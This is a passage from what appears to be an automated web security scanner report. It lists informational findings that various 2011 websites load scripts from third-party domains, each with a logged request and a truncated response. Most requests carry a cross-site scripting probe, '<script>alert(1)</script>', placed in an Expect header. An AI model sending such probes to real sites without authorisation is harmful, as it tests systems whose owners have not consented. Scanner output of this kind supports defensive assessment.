Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 02:00:53 GMT
Content-Length: 11505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<title>
404 |
...[SNIP]...
</script>
<script src="http://ad.afy11.net/srad.js?azId=1000004032907" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
</script>
<script charset="utf-8" src="http://feeds.feedburner.com/~s/Capitolhillseattle" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://edge.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"></script>
<script src="http://twitter.com/statuses/user_timeline/jseattle.json?callback=twitterCallback2&count=3" type="text/javascript"></script>
...[SNIP]...

22.12. http://www.cellphoneaccents.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cellphoneaccents.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cellphoneaccents.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 29256
Content-Type: text/html
Expires: Wed, 04 May 2011 00:54:27 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSARADRQQ=OJIHEJKDLJLKNGNBLHDHHAIJ; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:54:26 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></meta>
<title>Cell Phone Accessories . Di
...[SNIP]...
</script>

<script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a><script src="//upfront.thefind.com/scripts/main/utils-init-ajaxlib/upfront-badgeinit.js" type="text/javascript"></script>
...[SNIP]...
<!-- Advertiser 'cellphoneaccents: Remarketing' -->
<script src="http://ad.yieldmanager.com/pixel?id=1255597&t=1" type="text/javascript"></script>
...[SNIP]...

22.13. http://www.chickensoup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chickensoup.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chickensoup.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 90652
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDASSTTSDT=GAAFJMLDBPNHDHENPAFAGDLD; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:04:27 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<script type="text/javascript">

<!-- Begin
function popWindow(URL) {
...[SNIP]...
</style>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=42373&amp;target=_blank'></script>
...[SNIP]...
<!-- twitter widget -->
   <script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

22.14. http://www.cowboom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cowboom.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cowboom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Set-Cookie: acecookie=R1194250388; path=/
Connection: close
Date: Wed, 04 May 2011 01:05:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
EXPIRES: -1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 04 May 2011 01:05:53 GMT
Set-Cookie: acecookie=R3379086043; path=/
Set-Cookie: CFID=50798381; path=/; domain=.cowboom.com; HttpOnly
Set-Cookie: CFTOKEN=f0fdb3d7e478f510-B88A2A0D-ADAA-4D4F-DF477DF4655C3232; path=/; domain=.cowboom.com; HttpOnly


                                                       <html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--[if lt IE 7]>
<style type="text/css" media="sc
...[SNIP]...
<!--.12-->
   
   <script src="https://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

22.15. http://www.engcen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.engcen.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.engcen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 04:08:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8241
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDRTQRB=JPCCMCGACJDGOGODPJCKKOPG; path=/
Cache-control: private


<html>
<head>
<title>Engineering jobs, resumes & careers - engineers employment search</title>

<link rel="stylesheet" type="text/css" href="http://www.engcen.com/include/engcen.css">
<link rel="shortcut icon" href="images/favicon.ico">

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.16. http://www.ericksonliving.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ericksonliving.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ericksonliving.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 16569
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:51:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!--BEGIN ITRAC TRACKING-->
<script src="http://www.itracmediav3.com/itrac_v2.js" type="text/javascript"></script>
...[SNIP]...

22.17. http://www.facebook.com/plugins/facepile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/facepile.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&width=400&max_rows=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.204.36
X-Cnection: close
Date: Wed, 04 May 2011 00:54:05 GMT
Content-Length: 5630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

22.18. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/fan.php?id=28843894233&width=300&connections=10&stream=true&header=false&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.166.32
X-Cnection: close
Date: Wed, 04 May 2011 00:54:02 GMT
Content-Length: 12036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

22.19. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=www.facebook.com%2FBurtGoldmanFanPage&layout=button_count&show_faces=true&width=90&action=like&font=lucida+grande&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.154.31
X-Cnection: close
Date: Wed, 04 May 2011 00:53:33 GMT
Content-Length: 6433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

22.20. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&width=295&colorscheme=light&connections=15&stream=false&header=true&height=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.177.59
X-Cnection: close
Date: Wed, 04 May 2011 00:53:34 GMT
Content-Length: 14499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

22.21. http://www.fhainfo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fhainfo.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fhainfo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 00:41:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 19564
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCARQRAQ=FMFPCJEAGBIKDFKPJABOFIDH; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<meta name="keywords" content="fha mortgage insurnace, MIP, MMI, PMI, fha mortgage insurance, loan requirements,fha annual
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.22. http://www.fiserv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiserv.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fiserv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 39910
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:42:10 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head><!-- PageID 1859 - published by RedDot 7.5 - 7.5.1.91 - 14026 -->
<title>Fiserv - The Page You Requested Could Not Be Fou
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

22.23. http://www.halstead.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.halstead.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.halstead.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:50:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Halstead Prope
...[SNIP]...
</script>    
       
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.24. http://www.herbalessences.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herbalessences.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herbalessences.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Date: Wed, 04 May 2011 01:56:21 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /en-US/error-page.aspx?404;http://www.herbalessences.com:8098/favicon.ico
Set-Cookie: LOCALSUPPORT=en; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 376

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fen-US%2ferror-page.aspx%3f404%3bhttp%3a%2f%2fwww.herbalessences.com%3a8098%2ffavicon.ico">here</a>.</h2>
<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

22.25. http://www.heredomination.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heredomination.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heredomination.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Wed, 04 May 2011 01:44:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8784
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 01:44:02 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Domination Pictures</title>

...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

22.26. http://www.herenextdoor.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herenextdoor.tv
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herenextdoor.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Wed, 04 May 2011 01:52:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8749
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 01:52:52 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Next Door Videos</title>
<!-
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

22.27. http://www.hereteens.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hereteens.tv
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hereteens.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.1
Date: Wed, 04 May 2011 00:39:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8826
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 00:39:41 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Teens Movies</title>
<!-- SR
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

22.28. http://www.homedepotmoving.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homedepotmoving.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homedepotmoving.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=id2mh2j0b02hrk55zv4l4hnf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:13:06 GMT
Content-Length: 47037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><link href="../App_T
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=548dd417-1e15-4f9d-8415-a50034f18f3b&amp;type=website"></script>
...[SNIP]...
<div id="hdHeader">


<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/utils.js"></script>

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/sifr.js"></script>

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/tabs.js"></script>

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/appliance.js"></script>

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/ajax.js"></script>

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/order.js"></script>

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/appliance-calendar.js"></script>

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/appliance-related-services.js"></script>

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/thirdPartyCookie.js"></script>

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/nav.js"></script>

<script type="text/javascript" src="http://ext.homedepot.com/www/inc/dojo-release-1.3.1/dojo/dojo.js"
djconfig="parseOnLoad: true">
</script>
...[SNIP]...
<div style="display: none">

<script type="text/javascript" src="http://www.homedepot.com/wcsstore/hdus/scripts/s_code.js"></script>
...[SNIP]...

22.29. http://www.homeschoolreviews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeschoolreviews.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homeschoolreviews.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: HSR=5/3/2011 9:19:27 PM; expires=Sat, 04-May-2041 02:19:27 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15761


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><me
...[SNIP]...
<div id="topBanner">
<script type="text/javascript" src="http://abm.home-school-inc.com/abm.aspx?z=3"></script>
...[SNIP]...
<div style="margin-left:auto; margin-right:auto; text-align:center; border-left:solid 1px #999999; border-right:solid 1px #999999; background-color:#E7E7DE; padding-bottom:6px"><script language=JavaScript src="http://abm.home-school-inc.com/abm.aspx?b=324&z=10" ></script>
...[SNIP]...
<div style="margin-left:auto; margin-right:auto; text-align:center; border-left:solid 1px #999999; border-right:solid 1px #999999; background-color:#E7E7DE; padding-bottom:6px"><script language=JavaScript src="http://abm.home-school-inc.com/abm.aspx?b=97&z=10" ></script>
...[SNIP]...
<div style="margin-left:auto; margin-right:auto; text-align:center; border-left:solid 1px #999999; border-right:solid 1px #999999; background-color:#E7E7DE; padding-bottom:6px"><script language=JavaScript src="http://abm.home-school-inc.com/abm.aspx?b=250&z=10" ></script>
...[SNIP]...
<div style="margin-left:auto; margin-right:auto; text-align:center; border-left:solid 1px #999999; border-right:solid 1px #999999; background-color:#E7E7DE"><script language=JavaScript src="http://abm.home-school-inc.com/abm.aspx?b=104&z=10" ></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.30. http://www.huntermtn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huntermtn.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.huntermtn.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
